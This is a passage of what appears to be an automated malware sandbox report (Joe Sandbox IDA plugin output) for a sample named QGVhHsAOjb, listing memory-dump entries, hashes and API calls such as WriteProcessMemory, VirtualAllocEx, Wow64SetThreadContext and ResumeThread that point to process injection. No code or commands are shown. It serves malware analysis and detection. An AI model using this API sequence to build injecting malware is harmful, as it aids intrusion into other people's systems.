                                                                                                                                            • Instruction ID: 0c781799ec1084b0056efa0d91b1b72959a3c10dff7901113a199baffeef0306
                                                                                                                                            • Opcode Fuzzy Hash: accad03772c05c9873e8d866e88950bc37a08126b478b28e0b2f264c65884377
                                                                                                                                            • Instruction Fuzzy Hash: B341F5B1C00719CFDB24CFAAC8847DDBBB5BF49304F24809AD409AB255DBB5694ACF50
                                                                                                                                            APIs
                                                                                                                                            • CreateActCtxA.KERNEL32(?), ref: 02F059C9
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.1776138099.0000000002F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F00000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_2f00000_QGVhHsAOjb.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Create
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2289755597-0
                                                                                                                                            • Opcode ID: 1de873f5ed5ce9d6452870d765022b78f9655ed3fab828871dd412f644202110
                                                                                                                                            • Instruction ID: c065142186e8e345dea5baf883c893a0722588021419cdb8c07b503d761d9702
                                                                                                                                            • Opcode Fuzzy Hash: 1de873f5ed5ce9d6452870d765022b78f9655ed3fab828871dd412f644202110
                                                                                                                                            • Instruction Fuzzy Hash: E641F2B1C00719CFDB24CFAAC8847CEBBB5BF48304F60805AD509AB255DBB56949CF90
                                                                                                                                            APIs
                                                                                                                                            • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 050E0AD8
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.1779805049.00000000050E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050E0000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_50e0000_QGVhHsAOjb.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: MemoryProcessWrite
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3559483778-0
                                                                                                                                            • Opcode ID: 5a37388774d70ab9cc14539a919374fa89d13abbf0eb2144cde712ca461722c6
                                                                                                                                            • Instruction ID: a3b11e587818fbf5dacc8f27370182b6cb9b99867c514d80eeaa35410cd7dfd6
                                                                                                                                            • Opcode Fuzzy Hash: 5a37388774d70ab9cc14539a919374fa89d13abbf0eb2144cde712ca461722c6
                                                                                                                                            • Instruction Fuzzy Hash: B72155B190031D9FCB10CFA9C885BDEBBF5FF88310F10842AE959A7250C778A954CBA4
                                                                                                                                            APIs
                                                                                                                                            • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 050E092E
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.1779805049.00000000050E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050E0000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_50e0000_QGVhHsAOjb.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: ContextThreadWow64
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 983334009-0
                                                                                                                                            • Opcode ID: e98cbaf80e34e3dade7966480ddb8f2f758976cd0f9e402d153ba804cd4f70d9
                                                                                                                                            • Instruction ID: 524e48eb330a8d0470b04488867aea77f3f50163cc2632a4c0e79ea84350372e
                                                                                                                                            • Opcode Fuzzy Hash: e98cbaf80e34e3dade7966480ddb8f2f758976cd0f9e402d153ba804cd4f70d9
                                                                                                                                            • Instruction Fuzzy Hash: 5F2137B19003099FDB10DFAAC4857EEBBF1FF88324F20842AD459A7240DB789945CFA4
                                                                                                                                            APIs
                                                                                                                                            • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 050E0BB8
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.1779805049.00000000050E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050E0000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_50e0000_QGVhHsAOjb.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: MemoryProcessRead
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 1726664587-0
                                                                                                                                            • Opcode ID: b4ce8b2bfd1dc0215437c714667865689a0cf82c864366208d8e1c54ed8232dc
                                                                                                                                            • Instruction ID: 1680fc9402b54f3c6e8052867c45b4f3fb78af392e09c99b5a20a8a4fd485720
                                                                                                                                            • Opcode Fuzzy Hash: b4ce8b2bfd1dc0215437c714667865689a0cf82c864366208d8e1c54ed8232dc
                                                                                                                                            • Instruction Fuzzy Hash: A02136B1C002599FDB10CFAAC885AEEFBF1FF88314F10842AE559A7250C7789941CFA4
                                                                                                                                            APIs
                                                                                                                                            • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 050E0BB8
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.1779805049.00000000050E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050E0000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_50e0000_QGVhHsAOjb.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: MemoryProcessRead
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 1726664587-0
                                                                                                                                            • Opcode ID: 9263ffe0db99f7ee66d27731e77f3c0c689ddb8e7b4de844d482f93a7c91f5ce
                                                                                                                                            • Instruction ID: 83f3fdab6b9595f37e21b8b2813745a6534e8f8877a752f73fe37bc3483e2001
                                                                                                                                            • Opcode Fuzzy Hash: 9263ffe0db99f7ee66d27731e77f3c0c689ddb8e7b4de844d482f93a7c91f5ce
                                                                                                                                            • Instruction Fuzzy Hash: 9F2145B18003599FCB10CFAAC884AEEFBF5FF48320F10842AE559A7250C7789940CBA4
                                                                                                                                            APIs
                                                                                                                                            • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 050E092E
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.1779805049.00000000050E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050E0000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_50e0000_QGVhHsAOjb.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: ContextThreadWow64
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 983334009-0
                                                                                                                                            • Opcode ID: ac192de2ceea3da0130106a3af7f5a345dc4c7e5bee7ad5c009b97b362928162
                                                                                                                                            • Instruction ID: 5b8233b1cd3771a0a17b878d19c1f167abc65c610c19abd5b12bea90953f29cf
                                                                                                                                            • Opcode Fuzzy Hash: ac192de2ceea3da0130106a3af7f5a345dc4c7e5bee7ad5c009b97b362928162
                                                                                                                                            • Instruction Fuzzy Hash: 672129B19003098FDB10DFAAC4857EEBBF4EF88324F148429D459A7240D7789945CFA5
                                                                                                                                            APIs
                                                                                                                                            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 02F0D717
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.1776138099.0000000002F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F00000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_2f00000_QGVhHsAOjb.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: DuplicateHandle
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3793708945-0
                                                                                                                                            • Opcode ID: 66d4aa434713251857b0f5aea3cd7b8538467cf6f61fb2daacc76955ee067b42
                                                                                                                                            • Instruction ID: 46f26b8ce3ad22e349d8aa2970c5d89c943325da071c3466fe45bb7dd9eaacac
                                                                                                                                            • Opcode Fuzzy Hash: 66d4aa434713251857b0f5aea3cd7b8538467cf6f61fb2daacc76955ee067b42
                                                                                                                                            • Instruction Fuzzy Hash: EF21E2B59002589FDB10CFAAD984ADEBBF8EB48324F14801AE958A3350D374A950CFA4
                                                                                                                                            APIs
                                                                                                                                            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 02F0D717
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.1776138099.0000000002F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F00000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_2f00000_QGVhHsAOjb.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: DuplicateHandle
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3793708945-0
                                                                                                                                            • Opcode ID: faacfaddacc779879514a0489b7f9e32dc95c8dc1f9473fe40ca9e1c22e2b7aa
                                                                                                                                            • Instruction ID: 7ba5309a4836ee7a63ee2d29389f0da813f19e7d59c2960e8158a0731b06f782
                                                                                                                                            • Opcode Fuzzy Hash: faacfaddacc779879514a0489b7f9e32dc95c8dc1f9473fe40ca9e1c22e2b7aa
                                                                                                                                            • Instruction Fuzzy Hash: 1A21E0B5900218DFDB10CFA9D584AEEBBF4EB48324F14841AE958B7250D374A950CFA5
                                                                                                                                            APIs
                                                                                                                                            • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 050E09F6
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.1779805049.00000000050E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050E0000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_50e0000_QGVhHsAOjb.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: AllocVirtual
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 4275171209-0
                                                                                                                                            • Opcode ID: e983a9f6e00476e6d11d9bf0359da83fcc1fa76d333f15ee566eddea73222e58
                                                                                                                                            • Instruction ID: 8011ce1ae58a493847d0ea0da970ee4cab43b7b68213156a25f8edc15fe5a2f2
                                                                                                                                            • Opcode Fuzzy Hash: e983a9f6e00476e6d11d9bf0359da83fcc1fa76d333f15ee566eddea73222e58
                                                                                                                                            • Instruction Fuzzy Hash: 281167719002498FCB20DFAAC844BDFBFF5EF88320F208419E559A7250C775A550CFA0
                                                                                                                                            APIs
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.1781536098.0000000007670000.00000040.00000800.00020000.00000000.sdmp, Offset: 07670000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_7670000_QGVhHsAOjb.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: ResumeThread
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 947044025-0
                                                                                                                                            • Opcode ID: 3a343728ee40a7641aa918e4aeaf5e84b387b417aa26002ae4619e37a3e6a266
                                                                                                                                            • Instruction ID: 9f482f39f7b78e5ab561da47a4ef149847b5b67f2406c9d141fba739010e38ca
                                                                                                                                            • Opcode Fuzzy Hash: 3a343728ee40a7641aa918e4aeaf5e84b387b417aa26002ae4619e37a3e6a266
                                                                                                                                            • Instruction Fuzzy Hash: B81155B19002488FCB20DFAAC444BDFFBF4AB88324F208829C459A7250CB75A945CFA4
                                                                                                                                            APIs
                                                                                                                                            • PostMessageW.USER32(?,?,?,?), ref: 050E3EA5
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.1779805049.00000000050E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050E0000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_50e0000_QGVhHsAOjb.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: MessagePost
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 410705778-0
                                                                                                                                            • Opcode ID: 5bc4267a28e2ed12e3a643d01ffc8bd5ab42825c04bde5fcfb88cc5f1ed05ab4
                                                                                                                                            • Instruction ID: 14a57c6de17fa847c02e2208fd9fd4f9389d43493683ef1447cf92e1d9e79889
                                                                                                                                            • Opcode Fuzzy Hash: 5bc4267a28e2ed12e3a643d01ffc8bd5ab42825c04bde5fcfb88cc5f1ed05ab4
                                                                                                                                            • Instruction Fuzzy Hash: F311F2B5800249DFDB20DF9AD489BDEBBF4EB48314F20881AD959A7250C375A984CFA1
                                                                                                                                            APIs
                                                                                                                                            • GetModuleHandleW.KERNELBASE(00000000), ref: 02F0AFFE
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.1776138099.0000000002F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F00000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_2f00000_QGVhHsAOjb.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: HandleModule
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 4139908857-0
                                                                                                                                            • Opcode ID: 9fd0308b416438b743bab1c99abe8b389b2eacd9e5b4c2d2e1ae00037bf4ff7d
                                                                                                                                            • Instruction ID: f72279f987242a57930582fed6cd8ee60ee4ce0463e31f85bd97a8fe7b3d6be6
                                                                                                                                            • Opcode Fuzzy Hash: 9fd0308b416438b743bab1c99abe8b389b2eacd9e5b4c2d2e1ae00037bf4ff7d
                                                                                                                                            • Instruction Fuzzy Hash: F21110B6C003498FCB20CF9AC444BDEFBF4AB88328F10842AD568A7250D375A545CFA1
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.1780411946.0000000005710000.00000040.00000800.00020000.00000000.sdmp, Offset: 05710000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_5710000_QGVhHsAOjb.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: (bq
                                                                                                                                            • API String ID: 0-149360118
                                                                                                                                            • Opcode ID: ce5819097744208c6fd49ab784144ddafb47557d5a32c0347d3ec45717c1da5d
                                                                                                                                            • Instruction ID: a22f20edc76435dfd18b109d4680fbaa4cb42b4fa7782c7467b66c02243440c5
                                                                                                                                            • Opcode Fuzzy Hash: ce5819097744208c6fd49ab784144ddafb47557d5a32c0347d3ec45717c1da5d
                                                                                                                                            • Instruction Fuzzy Hash: 32910F71A05348DFCB18DFA9D8486AEBFF6FF85300F1088AAE846A7351DB349805CB54
                                                                                                                                            APIs
                                                                                                                                            • PostMessageW.USER32(?,?,?,?), ref: 050E3EA5
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.1779805049.00000000050E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050E0000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_50e0000_QGVhHsAOjb.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: MessagePost
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 410705778-0
                                                                                                                                            • Opcode ID: 6755e683afab408bb79b286ca2a93e5e6b1a4bef15d8f831b8ad1d7d617b581b
                                                                                                                                            • Instruction ID: 9de51a264787fab9cbf15cc1f66146231777268144a83a358cd26fbc6c1df0fd
                                                                                                                                            • Opcode Fuzzy Hash: 6755e683afab408bb79b286ca2a93e5e6b1a4bef15d8f831b8ad1d7d617b581b
                                                                                                                                            • Instruction Fuzzy Hash: E711D3B58003499FDB20DF9AD449BDEFFF8EB48324F208419D558A7250D375A544CFA5
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.1780411946.0000000005710000.00000040.00000800.00020000.00000000.sdmp, Offset: 05710000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_5710000_QGVhHsAOjb.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: (bq
                                                                                                                                            • API String ID: 0-149360118
                                                                                                                                            • Opcode ID: ea4472396fac128b11b0c5508cea2e104899571966bcbb8533fe2bcf4b035167
                                                                                                                                            • Instruction ID: fa44f41d647553ad5c220171355305403799fece5b133e71acae01a61d952e1a
                                                                                                                                            • Opcode Fuzzy Hash: ea4472396fac128b11b0c5508cea2e104899571966bcbb8533fe2bcf4b035167
                                                                                                                                            • Instruction Fuzzy Hash: 20817B70B402158FCB15DFACD485AAEBBF6FF89740F108569E406AB3A4DB34AC45CB94
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.1780411946.0000000005710000.00000040.00000800.00020000.00000000.sdmp, Offset: 05710000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_5710000_QGVhHsAOjb.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: (bq
                                                                                                                                            • API String ID: 0-149360118
                                                                                                                                            • Opcode ID: 5d2fe9f592ad1a51cf576575c256d54b596409d53d4ad40abc4c19e6d0cd0847
                                                                                                                                            • Instruction ID: 05f4000f45395d710d4f9959d81a28bf3d3642564f35c6da2652069ae54bd2ca
                                                                                                                                            • Opcode Fuzzy Hash: 5d2fe9f592ad1a51cf576575c256d54b596409d53d4ad40abc4c19e6d0cd0847
                                                                                                                                            • Instruction Fuzzy Hash: 82518C75B402058FCB1AEF7DC44466E7BE6FF89600B248469E406DB3A4DA74EC45CB91
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.1780411946.0000000005710000.00000040.00000800.00020000.00000000.sdmp, Offset: 05710000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_5710000_QGVhHsAOjb.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: (bq
                                                                                                                                            • API String ID: 0-149360118
                                                                                                                                            • Opcode ID: 5979e9d46523f5d611a78737d9b50dac526a22c66cab04854375bb682dc04846
                                                                                                                                            • Instruction ID: ab537f0f3b1d4202630ee7452c2f7c2a0929ee7b3cb68f147f179cacade191c9
                                                                                                                                            • Opcode Fuzzy Hash: 5979e9d46523f5d611a78737d9b50dac526a22c66cab04854375bb682dc04846
                                                                                                                                            • Instruction Fuzzy Hash: 2141D231B046618FCB0AAB7D941812E7BE7BFC5690718456ED90BDF394EE24CC0297D9
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.1780411946.0000000005710000.00000040.00000800.00020000.00000000.sdmp, Offset: 05710000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_5710000_QGVhHsAOjb.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: Nv]q
                                                                                                                                            • API String ID: 0-585401923
                                                                                                                                            • Opcode ID: 4412924b65286433bc0fc1b9e60881e6ecbf9fe77be28fcf3ce9868fa9ffa448
                                                                                                                                            • Instruction ID: 7ecec43a1012379b930c63cff3df9c76d444debb826c76ce28b62f9c9bcdfa6d
                                                                                                                                            • Opcode Fuzzy Hash: 4412924b65286433bc0fc1b9e60881e6ecbf9fe77be28fcf3ce9868fa9ffa448
                                                                                                                                            • Instruction Fuzzy Hash: E8410570E01609DBDB04EFD9E4886DDBFB1FF88300F119065E899AB258DB319965CB58
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.1780411946.0000000005710000.00000040.00000800.00020000.00000000.sdmp, Offset: 05710000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_5710000_QGVhHsAOjb.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: Nv]q
                                                                                                                                            • API String ID: 0-585401923
                                                                                                                                            • Opcode ID: 0019e066deb1697d887f689de399af3c99324a2be6b4b16154ff8cd92992e9c1
                                                                                                                                            • Instruction ID: 80b5d3bbcb27bc051d795b160e7f57d2a875783b46c1fc7de53a07a9bd8f99d4
                                                                                                                                            • Opcode Fuzzy Hash: 0019e066deb1697d887f689de399af3c99324a2be6b4b16154ff8cd92992e9c1
                                                                                                                                            • Instruction Fuzzy Hash: 18411670E0160DDBCB04EFD9E4886DDBFB1FF88300F519065E898AB258DB309965CB59
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.1780411946.0000000005710000.00000040.00000800.00020000.00000000.sdmp, Offset: 05710000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_5710000_QGVhHsAOjb.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: x=_
                                                                                                                                            • API String ID: 0-882893857
                                                                                                                                            • Opcode ID: 8e1bbab6c2e0ce824a4be3b58964d75d1f3c0d1eabd1e85f567e4aaaec9c4ac4
                                                                                                                                            • Instruction ID: c23aaee86b85ad480138c2d00e9f0e3ae0f0c4e94c01bd713b546667f47344d7
                                                                                                                                            • Opcode Fuzzy Hash: 8e1bbab6c2e0ce824a4be3b58964d75d1f3c0d1eabd1e85f567e4aaaec9c4ac4
                                                                                                                                            • Instruction Fuzzy Hash: 424103B5D00219CFDB24DFAAC584ACDBFB5BF48304F24802AD808BB215D7756A4ACF94
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.1780411946.0000000005710000.00000040.00000800.00020000.00000000.sdmp, Offset: 05710000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_5710000_QGVhHsAOjb.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: x=_
                                                                                                                                            • API String ID: 0-882893857
                                                                                                                                            • Opcode ID: aa62118619d9a53559bf6ad6af7f45b2f3df8c3010ab578abe788b56b0cc4829
                                                                                                                                            • Instruction ID: 6189e697cdc9310b256cc67fc8984b7ed7439bc89b141a8b107f83a53d541974
                                                                                                                                            • Opcode Fuzzy Hash: aa62118619d9a53559bf6ad6af7f45b2f3df8c3010ab578abe788b56b0cc4829
                                                                                                                                            • Instruction Fuzzy Hash: 8241F3B0D00619DFDB24DF9AC984ACDBBB5BF48304F248029D808BB215D7756A46CF95
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.1780411946.0000000005710000.00000040.00000800.00020000.00000000.sdmp, Offset: 05710000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_5710000_QGVhHsAOjb.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: x=_
                                                                                                                                            • API String ID: 0-882893857
                                                                                                                                            • Opcode ID: 13f491ab9683c42cf5d082e806a56f96c7b12e3edfb7fcb5f3fd4cd780dc1536
                                                                                                                                            • Instruction ID: 44d729a5fb62eb4a66c76c66194170021a5f088593ceba91d8d5abdad4d5b217
                                                                                                                                            • Opcode Fuzzy Hash: 13f491ab9683c42cf5d082e806a56f96c7b12e3edfb7fcb5f3fd4cd780dc1536
                                                                                                                                            • Instruction Fuzzy Hash: D42104756042058FC701EF39D8488ABBBF6FF81200B1488AAD946DB352EF71DC098BA5
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.1780411946.0000000005710000.00000040.00000800.00020000.00000000.sdmp, Offset: 05710000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_5710000_QGVhHsAOjb.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: x=_
                                                                                                                                            • API String ID: 0-882893857
                                                                                                                                            • Opcode ID: 940c9e367daefa5e0a8957ba747f0ff5688bb7869fb905be6ba296cb0df4007a
                                                                                                                                            • Instruction ID: 5ed7c180e82103bec6dc77ccc3f1c25d8df48a45c5d09cb34b38dfe6118d3550
                                                                                                                                            • Opcode Fuzzy Hash: 940c9e367daefa5e0a8957ba747f0ff5688bb7869fb905be6ba296cb0df4007a
                                                                                                                                            • Instruction Fuzzy Hash: F62124B4A002058FC711EF79D9458AEBBF6FF84210B1089BAD805DB361EB30ED089F94
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.1780411946.0000000005710000.00000040.00000800.00020000.00000000.sdmp, Offset: 05710000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_5710000_QGVhHsAOjb.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: x=_
                                                                                                                                            • API String ID: 0-882893857
                                                                                                                                            • Opcode ID: 63c9edc05a873a951c6e7c19ee67d353c9e4581107a8240d9d56173cb256ef22
                                                                                                                                            • Instruction ID: 079448f8fb84db266fb30eab3b1b782b420a6033bbe026a21aee01200db0eea1
                                                                                                                                            • Opcode Fuzzy Hash: 63c9edc05a873a951c6e7c19ee67d353c9e4581107a8240d9d56173cb256ef22
                                                                                                                                            • Instruction Fuzzy Hash: 3521D5746002058FC711EF7AC8488ABBBF6FFC1610B0089A9D945DB351EB30DD088B95
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.1780411946.0000000005710000.00000040.00000800.00020000.00000000.sdmp, Offset: 05710000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_5710000_QGVhHsAOjb.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: 4'^q
                                                                                                                                            • API String ID: 0-1614139903
                                                                                                                                            • Opcode ID: ff809e9d7c30580dea98902847c89436df519a7cfccc19375a8fc01f205d114e
                                                                                                                                            • Instruction ID: d8506c5f8d5588b37d09f009a9c7a1daf5650c8eca9dee939f764e226e59a8d0
                                                                                                                                            • Opcode Fuzzy Hash: ff809e9d7c30580dea98902847c89436df519a7cfccc19375a8fc01f205d114e
                                                                                                                                            • Instruction Fuzzy Hash: 4511CB70D092499FCB01EFB4E95628DBFF0FF41201F0505A89805AB292EF385A08CB41
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.1780411946.0000000005710000.00000040.00000800.00020000.00000000.sdmp, Offset: 05710000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_5710000_QGVhHsAOjb.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: 4'^q
                                                                                                                                            • API String ID: 0-1614139903
                                                                                                                                            • Opcode ID: 76330119080cfac1a2706492456a6830ce215e4931ddd625d6f4b1da75d5f766
                                                                                                                                            • Instruction ID: 963774ef2474ebe9dbf563d91974b3aae60d988fd7c706d5f08db0473a6ee9da
                                                                                                                                            • Opcode Fuzzy Hash: 76330119080cfac1a2706492456a6830ce215e4931ddd625d6f4b1da75d5f766
                                                                                                                                            • Instruction Fuzzy Hash: 8CF01970A0520A9FCB44FFB8E69659CBFF1FB84201F1005A8D805AB354EF345E488B41
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.1780411946.0000000005710000.00000040.00000800.00020000.00000000.sdmp, Offset: 05710000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_5710000_QGVhHsAOjb.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 85e485c502c68c7b1264c1d957cb60a33b4b3153fdc20885242861d209ac3b02
                                                                                                                                            • Instruction ID: 11133aecdf3840c95e9d39113b1bf8dc5b01d16913b6b793b5a8ead59efa894b
                                                                                                                                            • Opcode Fuzzy Hash: 85e485c502c68c7b1264c1d957cb60a33b4b3153fdc20885242861d209ac3b02
                                                                                                                                            • Instruction Fuzzy Hash: 3C720F31D10619CFDB14EF68C898AADFBB1FF45304F008699D54AA7265EF309AC9CB81
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.1780411946.0000000005710000.00000040.00000800.00020000.00000000.sdmp, Offset: 05710000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_5710000_QGVhHsAOjb.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: ebf24b32c085ed64fd5c5cc3556d07f2593cd8e6f5a6bf1e3466a857084ef806
                                                                                                                                            • Instruction ID: 13a2b9683ba10ad4d555d525cfb6dc26034771be52b53cf29483d8a328240a1b
                                                                                                                                            • Opcode Fuzzy Hash: ebf24b32c085ed64fd5c5cc3556d07f2593cd8e6f5a6bf1e3466a857084ef806
                                                                                                                                            • Instruction Fuzzy Hash: FF42D631E106198FCB25DF68C8946EDF7B1FF89300F1186A9D859BB251EB30AA85CF44
                                                                                                                                            Memory Dump Source
